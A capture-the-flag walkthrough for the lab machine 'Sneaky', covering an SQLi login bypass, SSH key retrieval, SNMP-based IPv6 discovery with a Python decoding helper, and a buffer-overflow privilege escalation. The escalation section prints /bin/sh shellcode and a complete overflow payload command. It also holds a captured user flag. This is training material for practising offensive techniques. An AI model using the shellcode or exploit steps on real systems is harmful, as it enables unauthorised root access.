Sneaky - 10.10.10.20

Target Enumeration:

IP: 10.10.10.20
User: 9fe14f76222db23a770f20136751bdab
Root: See screenshot

Ports / Services / Software Versions Running

80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)

Vulnerability Exploited:

SQLi authentication bypass
User's SSH key stored on the web server.

Privilege Escalation:

/usr/local/bin/chal is vulnerable to a buffer overflow

Exploiting the host:

Nmap:
Dirb:
/dev is a login page
Intercept the login request and fuzz it for SQLi with Burp Intruder:
You can bypass the login with an SQLi payload
Request the page in the browser and download the key
Key contents
No SSH port is open on IPv4, so we need to find the host's IPv6 address.
Check our own IPv6 address
snmpwalk with the default public community string gives lots of information:
Find the IPv6 info
Convert from decimal to hex
iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248
254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248
Convert to hex with Python:
Build the address in the same format (the interface identifier stays the same, only the prefix changes)
Dead:beef::250:56ff:feb2:8ef8
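The decode-to-hex step above, as an added example that is not part of the original writeup: the OID is a row of the IP-MIB ipAddressTable (RFC 4293), whose index is the address type (2 = IPv6), the address length (16) and the address octets in decimal. The function parses that index, returns the address, and a second helper swaps the link-local prefix for a global /64 while keeping the interface identifier, which is how the dead:beef address above is built. The dead:beef::/64 prefix is taken from the address on the page; the sample walk line is constructed.

```python
import ipaddress

# Constructed sample: the ipAddressIfIndex row from the snmpwalk output above.
# net-snmp prints the leading arc 1 as "iso" and may append " = <type>: <value>".
SAMPLE_WALK_LINE = ("iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248"
                    " = INTEGER: 2")

# IP-MIB::ipAddressEntry (RFC 4293): .1.3.6.1.2.1.4.34.1.<column>.<addrType>.<len>.<octets...>
IP_ADDRESS_ENTRY_PREFIX = ".1.3.6.1.2.1.4.34.1."
INET_ADDRESS_LENGTHS = {1: 4, 2: 16}  # InetAddressType: 1 = ipv4, 2 = ipv6


def decode_ip_address_oid(walk_line):
    """Return the ipaddress object encoded in an ipAddressTable row index.

    Accepts a bare OID ("iso.3.6..." or "1.3.6...") or a full snmpwalk line.
    """
    oid = walk_line.split(" = ", 1)[0].strip()
    oid = "." + oid.replace("iso", "1").lstrip(".")
    if not oid.startswith(IP_ADDRESS_ENTRY_PREFIX):
        raise ValueError("not an ipAddressTable OID: %s" % oid)
    parts = [int(p) for p in oid[len(IP_ADDRESS_ENTRY_PREFIX):].split(".")]
    if len(parts) < 3:
        raise ValueError("OID too short to carry an InetAddress index")
    # parts[0] is the column (3 = ipAddressIfIndex); the index follows.
    addr_type, length, octets = parts[1], parts[2], parts[3:]
    if INET_ADDRESS_LENGTHS.get(addr_type) != length or len(octets) != length:
        raise ValueError("malformed InetAddress index")
    if not all(0 <= o <= 255 for o in octets):
        raise ValueError("sub-identifier out of octet range")
    # ipaddress.ip_address accepts packed 4- or 16-byte form directly.
    return ipaddress.ip_address(bytes(octets))


def with_global_prefix(link_local, prefix):
    """Keep the 64-bit interface identifier of link_local, replace the /64 prefix."""
    net = ipaddress.IPv6Network(prefix)
    if net.prefixlen != 64:
        raise ValueError("expected a /64 prefix")
    interface_id = int(link_local) & ((1 << 64) - 1)
    return ipaddress.IPv6Address(int(net.network_address) | interface_id)


if __name__ == "__main__":
    ll = decode_ip_address_oid(SAMPLE_WALK_LINE)
    print("link-local from SNMP:", ll, "(link-local: %s)" % ll.is_link_local)
    # Assumed global prefix: the one used by the address on the page.
    print("global guess:        ", with_global_prefix(ll, "dead:beef::/64"))
```

Running it prints the fe80 link-local address first; because that address is link-local it is only reachable on the same segment, which is why the global prefix has to be substituted before ssh -6 is attempted from another network. From the defensive side, the same parser run over a walk of the whole table shows exactly which addresses an agent with a default community string is disclosing.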
Log in with ssh -6, the username and the key
Search for a privesc
Running the file shows it could be vulnerable to a buffer overflow
Check that you can overwrite the return address:
Generate a pattern to locate offset
Dump that into the program
Query the offset
Found the offset
Build the overflow using a /bin/sh shellcode
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
You will need to try various memory addresses to get this to exploit reliably:
Open gdb and find the stack address:
(gdb) run AAAAAAAAAAAAAAAAAA-SNIP-AAAAAAA
Convert the address to little endian
Build your payload as follows:
/usr/local/bin/chal $(python -c 'print "A"*362+"\xbe\xf4\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')
Now you have a root shell, so collect the flags.